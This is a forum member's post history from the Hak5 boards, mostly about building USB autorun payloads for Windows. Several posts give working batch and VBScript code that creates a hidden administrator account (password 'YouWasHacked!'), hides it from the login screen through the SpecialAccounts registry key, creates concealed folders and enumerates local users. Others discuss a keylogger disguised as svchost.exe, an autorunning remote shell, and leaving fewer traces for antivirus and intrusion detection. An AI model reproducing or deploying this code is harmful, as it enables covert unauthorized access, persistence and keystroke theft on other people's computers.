DMilton
-
Posts
132 -
Joined
-
Last visited
Posts posted by DMilton
-
-
Will be tuned to see it!
-
Well I am working on a project and I am creating a batch file that will export some "Auto complete" data to a text file silently. (Using some of the Nirsoft tools) but I was wondering is there a way to time/date stamp the txt files.
I know 'time' and %date% will show the date but I cant get the created txt file's name to be either the time or date. Below is the syntex from nirsoft's web site, but i was wondering if any one knew what I could use to created:
\stext %date%.txt
If you look at the syntext below you will see that in therory that will create a text file with the actual date as the file name.. it doesn't any ideas?
/stext <Filename> Save all email accounts into a regular text file.
/stab <Filename> Save all email accounts into a tab-delimited text file.
/scomma <Filename> Save all email accounts into a comma-delimited text file.
/stabular <Filename> Save all email accounts into a tabular text file.
/shtml <Filename> Save all email accounts into HTML file.
/sverhtml <Filename> Save all email accounts into HTML file. (vertical)
/sxml <Filename> Save all email accounts into XML file.
You can format the date by using a simple vbScript and passing variables to the batch.
Something like this will give you the date-time in a good aspect:
Set objShell = CreateObject("Wscript.Shell" Set objEnv = objShell.Environment("PROCESS") strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2) strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2) 'Mes/Dia/Año strFormDate = Right("0" & Month(now()), 2) & "." & Right("0" & Day(now()), 2) & "." & Year(now()) 'HH:MM:SS strFormTime = Right("0" & Hour(now()), 2) & "." & Right("0" & Minute(now()), 2) & "." & Right("0" & Second(now()), 2) objEnv("Date") = strFormDate objEnv("Time") = strFormTime strPath = "YOURBATCH.BAT" objShell.Run strPath, 1, Falseyou can pass the Date and Time vbs variables to the YOURBATCH.BAT to format the time and date of the loggs:
\stext %computername%[%Date%-%Time%].txt etc...
:EDIT
The first line must be:
Set objShell = CreateObject("Wscript.Shell") -
System.exe detected by NOD32 antivirus as NewHeur_PE (Virus)... When downloading the .rar.
With the payload.exe, I get another advice with b2e.dll as Win32/Qhost.NFV (Trojan) with NOD32. Is the b2e.dll part of the backdoor?
I think the payload.exe does the payload.bat stuff with the AdminGroup variable given by 1.vbs, installing all the keylogger and backdoor, opening ports, adding reg keys, etc...?
Are all the needed programs packed in the payload.exe?
The medicine continues going wrong with not conventional paths, It can be done by using a similar way as for installing the payload.
I like the easy and effective way the keylogger works but it doesn't work with combination of [ALT]. When a combination is pressed (as [CTRL]+something) the [CTRL] is printed many times... I assume no clicks are saved to the keylogger log...
I will be testing some of the functionalities in a few days.
Too many things?
Good job and many thanks for the credits!
-
But... What do you want to delete? I think is not very difficult to script it but. What do delete? Many files are running in the background (as system, and user files) and can't be deleted. If you want to delete some of them (as for example some dll or some anvirus file, you must to kill them (see killing av's in this forum) or you must to do it before the system has been restarted (as done by Unlocker).
If you tell us what you want to delete, it could be possible to program an application to do the job.
Is the job you're thinking a white hat hacking?
-
I found this on Gonzor's forum and it worked with my 8gb cruzer micro. just replace the U3Cutom.iso with your new one.
We'll try it. Thanks!
-
Some issues and fixing them...
net user Tanto password /add && net localgroup administrators Tanto /add
In the adding of Tanto administrator account, the payload only will create it if the Group name of administrators is "administrators" (it's not my case). It will cause an error and will not work for systems wich Administrators Groups have been changed to another name or is installed in other language system.
A solution will be getting the correct administrators group name for a secure creating of the Tanto user.
This way was the one I was developing in this post. The idea is getting the name of Administrators Group by asking for the S-1-5-32-544 SID and passing it to the payload in a variable.
::Hide Tanto's folder from prying eyes attrib +r +a +s +h %SystemDrive%\docume~1\Tanto
Before you attrib anything, you must creating the folder and in the batch code isn't.
The correct code would be:
::Create and hide Tanto's folder from prying eyes mkdir %SystemDrive%\docume~1\Tanto attrib +r +a +s +h %SystemDrive%\docume~1\Tanto
::Change file attributes to Read-only, Hidden, Archive, and System attributes to the file ATTRIB +H %windir%\svchost.exe
In the attribution of Read-only, Hidden, Archive and System to the keylogger you ommited the +r +a +s
Correct line would be:
::Change file attributes to Read-only, Hidden, Archive, and System attributes to the file ATTRIB +r +a +s +hH %windir%\svchost.exe
::Delete Keylogger ( cd %windir% del svchost.exe )
In deletion task of the svchost.exe file, this code will fail because the payload is running from the usb and not de %Systemdrive%.
The correct code would be:
::Delete Keylogger del %windir%\svchost.exe
SUGGESTIONS
I prefer to add the name of the account an the password by putting it in a variable at the beggining of the batch or in an .ini file if it's exe-compiled and can't be eddited, so we can add the user we want and not only Tanto user.
-
Hak5 Community Rainbow Tables Site and Contact Information
Hak5 CRT News Updates / RSS News Feed:[/b]
Doesn't work the blogspot rtables?
-
Windows Firewall works fine and is easy to configure.But if you have a router, configuring both would be the best option for me.
-
I have a new 8Gb SANDISK usb and get the same problem!
Is there any new version available? I have been looking for it but...
-
Isn't this like...illegal? (Correct me if I'm wrong though...I thought this place was about the good side of the whole hacking scene.)
The illegalitty is not what you have, but what you do with it... If you do illegalitties, then it's illegal<_<
-
-
I found a little option I overlooked before. If you have any bug reports or anything just lemme know I'll fix it right up.
The only one I have by the momment is the fault of profiles selection, but I haven't prooved alll the stuf...
-
I saw it, you have done a fast work, but by the way, I hope, the code I posted will be interesting for someone!
-
If you want, whe can code an aspirine for you, man!
You did it fast and easy, good job, I feel the idea is very good! I'll be testing it during next days.
The name of the tool is cool.
Sleep a bit by now!
:edit
By the way, I don't know if the antidote is working, because it doesn't delete the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Tanto user.
It doesn't generate the .txt files, only if I exec it from system drive root.
When exec it, it leaves three exe files running in Task Manager: beta2.exe, cmd.exe and reg.exe.
Antidote doesn't terminate those tasks at all and leaves another reg.exe instance running in background.
I think it can be caused because any problem with path names?
If you want, PM the source, I'll try a look at it.
-
Thats awesome, thank you very much. I am still reviewing what it is exactly that I want, i.e. to include the keylogger. There would not be a need for the logs to be sent off because you could transfer it via remote shell. Another thing i was considering is the "guest trick". Where when logged on via guest a batch script containing instruction to create an admin account is placed in the admins startup folder. If that is modified to allow RDP then we can install the shell via RDP when the owner is away from their desk.. Just throwing things out there :).
Meanwhile you decide what the payload should do, I've been playing with some your firsts ideas.
Executing it, will extract the Administrators group name in a sure way for any installation language or even if the user is experimented and has changed it to a variable that can be used by the called batch. The idea of using a batch called program is to continue in the batch way you mentioned, but because I don't know how extract the real Administrators Group name in command line, I did it in VbScript, ready to use.
By the way, here it is the code for the VbScript
'ListAdminGroup.vbs Set objWshNetwork = CreateObject("WScript.Network") Set objShell = CreateObject("Wscript.Shell") Set objEnv = objShell.Environment("PROCESS") str_PC = objWshNetwork.ComputerName ' SID of the Administrators group str_GroupSID = "S-1-5-32-544" str_GroupName = GetGroupName(str_PC, str_GroupSID) Set obj_Group = GetObject("WinNT://" & str_PC & "/" _ & str_GroupName & ",group") objEnv("AdminGroup") = str_GroupName strPath = "start.bat" objShell.Run strPath, 1, False Function GetGroupName(sComputer, sGroupSID) Dim oGroupAccounts, oGroupAccount 'Set for WinXP Set oGroupAccounts = GetObject( _ "winmgmts://" & sComputer & "/root/cimv2") _ .ExecQuery("Select Name from Win32_Group" _ & " WHERE Domain = '" & sComputer & "' AND SID = '" & sGroupSID & "'") 'For Win2k we use the 'BUILTIN' domain If oGroupAccounts.Count = 0 Then Set oGroupAccounts = GetObject( _ "winmgmts://" & sComputer & "/root/cimv2") _ .ExecQuery("Select Name from Win32_Group" _ & " WHERE Domain = 'BUILTIN' AND SID = '" & sGroupSID & "'") End If For Each oGroupAccount In oGroupAccounts GetGroupName = oGroupAccount.Name Next End FunctionI think it will work in Windows XP and Windows 2000 but if you can play with it in other versions, will be great.
Once the script has finished, it launches the start.bat batch. It will create an administrator account wich name is defined in %NewAdmin% variable, with a password given by %password% variable, and adding it into Administrators Group, using the variable in %AdminGroup% given by the vbs. Creates the correct folder, hides it, and add the new account name to the Special Accounts, for being invisible to the user.
Here it is the start.bat code. By the way, it must be on same dir as VbScript.
::start.bat @echo off set NewAdmin=USBAdmin set password=YouWasHacked! set Folder=%SystemDrive%\Documents and Settings\%NewAdmin% net localgroup %AdminGroup% %NewAdmin% /add net user %NewAdmin% %password% /add REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %NewAdmin% /t REG_DWORD /d 0 mkdir "%Folder%" attrib +a +s +h "%Folder%"
It will solve too the Tcstool for fewer fingerprints:
* We can use the net user command to add the user to system/administrators group, then use the REG command to modify the keys as needed, as opposed to creating files on the machine. Fewer fingerprints!About Tcstool quesion:
* we can dump the users with the net users command instead of dumping the registry key. Again, trying to leave fewer fingerprints and engage in less suspicious activity likely to be caught by AV/host based IDS type progs.The code for Users.vbs can be:
'Users.vbs Option Explicit Dim obj_UserName Dim obj_GroupName Dim obj_PC Dim obj_Group Dim obj_Shell Dim str_Computer Dim str_Name Dim objFSO Dim objTextFile Dim str_File Dim M Const ForReading = 1, ForWriting = 2, ForAppending = 8 If WScript.Arguments.count > 0 Then str_File = WScript.Arguments.item(0) Else str_File = "users.txt" End If Set objFSO = CreateObject("Scripting.FileSystemObject") Set objTextFile = objFSO.OpenTextFile (str_File, ForWriting, True) str_Computer = "." Set obj_Shell = CreateObject("WScript.Shell") str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%") Set obj_PC = GetObject("WinNT://" & str_Computer & ",Computer") obj_PC.Filter = Array("Group") For Each obj_GroupName In obj_PC Set obj_Group = GetObject("WinNT://" & str_Computer & "/" & obj_GroupName.Name & ",Group") obj_Group.members.Filter = Array("User") For Each obj_UserName In obj_Group.members set M = obj_UserName objTextFile.WriteLine(obj_UserName.Name) Next NextIt will extract all users names in a new users.txt file, for further use of it.
And that's all by the momment!
-
I'm cleaning the code you posted, doing it efficient in any instalation language system, adding some other and it will be posted as soon as I have it working right.
-
-
Fail. Server 2003 identifies as 5.2, regardless of whether it's 32 or 64bit. This is due to the fact that XP64 is essentially a client version of Server 2003.
That's occurs when one can't try it in Server 2003... Ok, another thing to think about! <_< I'll be squishing my little brain to find a solution (in batch) for helping in the payload development. Thanks a lot for your memo moonlit. -
So Ive been contemplating making a new payload for a while... These are some of the things that I want to inplement:
1. No .VBS or .NET
2. Mostly command line, and the .BATs will all be .EXEs, just because i like those better
3. Dump SAM or create a New admin, via command line, preferable both
4. Install a remote shell, this part is already take care of
5. Dump a list of all users on the computer
And thats about it. The remote shell autoruns and adds itself to the registry. I want to keep this as small and as basic as possible.. So there isnt any slurping of docs and what not, maybe pics ;). The dumping part will be done via command lin, ie. run rs.exe, because the shell copies its self onces its ran. Other than that i have a good keylogger, runs low on mem and can be customized... Right now I am still looking for ideas, so if you have any let me know.
For the point 5. you can execute this code, it's in VbScript. Of course, it can be moddified to show only the users and not the groups...
UsersGroups.vbs
'UsersGroups.vbs 'This script enumerates users, grouped for each local group in a computer 'It creates a new file called users.txt in the same directory from it's executed. 'The code has been rebuilded from a similar app, but it works fine 'DMilton for free community 'Thread post at http://hak5.org/forums/index.php?showtopic=10746 'Variables explicit declaration Option Explicit Dim obj_UserName Dim obj_GroupName Dim obj_PC Dim obj_Group Dim obj_Shell Dim str_PC Dim str_Name Dim objFSO Dim objTextFile Dim I Dim ExitFile Const ForReading = 1, ForWriting = 2, ForAppending = 8 'Arguments ExitFile = "users.txt" 'Exit file creation Set objFSO = CreateObject("Scripting.FileSystemObject") Set objTextFile = objFSO.OpenTextFile (ExitFile, ForWriting, True) 'Local computer var creation str_Name str_PC = "." Set obj_Shell = CreateObject("WScript.Shell") str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%") 'Creates an object obj_PC containing actual local computer Set obj_PC = GetObject("WinNT://" & str_PC & ",Computer") ObjTextFile.WriteLine("Computer name is: " & str_Name) 'Now we filter objects to obtain groups obj_PC.Filter = Array("Group") 'Going through the objects and writting the txt For Each obj_GroupName In obj_PC 'Creating an object obj_Group containing actual group Set obj_Group = GetObject("WinNT://" & str_PC & "/" & obj_GroupName.Name & ",Group") 'Writting the txt and formatting it objTextFile.WriteLine("Users from Group: " & obj_GroupName.Name) 'Filtering objects from the group to obtain users obj_Group.members.Filter = Array("User") 'Printing each one user For Each obj_UserName In obj_Group.members objTextFile.WriteLine(" " & obj_UserName.Name) Next Next 'Cleaning the variables Set obj_UserName = Nothing Set obj_GroupName = Nothing Set obj_PC = Nothing Set obj_Shell = NothingMoreover, I think that with groups info in the final users.txt, adding a key in registry for creating an admin account is simple, or not?
net user "USBAdmin" /add net localgroup administrator "USBAdmin" /add net user "USBAdmin" password
The problem with adding privileges is that this automation would work in English versions but not in other languages as Spanish, where Administrators group is named Administradores, but with the listed groups in the vbs, you can extract easily the "Admin"-istrator or "Admin"-istradores correct word to add the correct privileges.
Finaly, it would be necessary, adding the "USBAdmin" to the Special Account Users List, by adding a DWORD 0 to the created "USBAdmin" by executing in a batch (or whatelse). In this case, from command line would be...
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v USBAdmin /t REG_DWORD /d 0
:P
-
Those ones are the latest and in my oppinion, the bests ones to work with, but you can also add the U3 Incident Response Payload that, very basically, it's used to get forensic information from the PC.
Read the topic, I think it'll be interesting U3 Incident Response Payload
-
That's cool man! You get the non .Net Framework version and it looks fine. Thanks for your effort in this. How did you avoid the using of .Net Framework?
Other thing is... the profile selector... But looks ok. I'll be testing it for a while and waiting for Leapo's updates to make it better.
-
okay I was told these files are outdated, and I now the gonzor one is because its giving the 1.2 and he's got the v2.0 out. hence the reason I was saying the most updated verisons
It'll be perfect that you do it by yourself, by looking for the outdated files (the most we can find at nirsoft website), searching and grabbing the Internet, recopiling some interesting posts containing new code for implementation, the GonZor 2.0 version... etc
And when you have it, the best is that you post it. You can upload the files to the packages point, can correct the obsoltete wiki contents, can code some new stuff and create a great usb payload with all this.
Jokes appart, the one you are looking for is out of there, the only you have to do is search for it ElevenWarrior. As I told you a few days ago, googleing is one of the bests ways to find out what you want, and if not found... search again, and finally: asking.
-
Fine, but next time, I suggest you the search tool or googleing it... If it took me about 30 secs to find it, probably you would be able to find it too! Searching is the best way to find what you're looking for and it's a good way to find very interesting things you're not looking for too.
-
Of course, you can install the original version of the U3 CRUZER from SANDISK...
That's occurs when one can't try it in Server 2003... Ok, another thing to think about! <_< I'll be squishing my little brain to find a solution (in batch) for helping in the payload development. Thanks a lot for your memo moonlit.
Need .bat file help
in Questions
Posted
:P It was only a little modified copy-paste, a piece of code from somewere of some payload...